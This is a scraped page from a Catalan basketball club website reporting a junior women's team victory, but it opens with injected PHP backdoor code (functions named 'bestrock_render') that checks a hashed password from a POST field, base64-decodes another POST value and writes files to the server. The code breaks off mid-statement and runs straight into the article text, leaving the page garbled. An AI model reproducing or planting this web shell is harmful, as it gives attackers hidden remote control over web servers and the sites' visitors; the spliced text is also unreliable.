function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení B en té prou amb vint minuts per vèncer l'AAEET (44-24) - Tgn Bàsquet Club -

El júnior femení B en té prou amb vint minuts per vèncer l’AAEET (44-24)

Updated: gener 21, 2014

Victòria plàcida del júnior femení B del TGN Bàsquet contra l’AAEET Valls. L’equip que entrena Montse Martí va decidir el partit en la primera meitat (29-11) gràcies a una gran defensa que li va permetre recuperar un munt de pilotes i poder, d’aquesta manera, sortir ràpidament al contraatac. La superioritat mostrada en els primers vint minuts va passar factura a les locals en forma de relaxació. Així, es van fallar tirs fàcils i els atacs van perdre fluïdesa, però la victòria no va perillar en cap moment.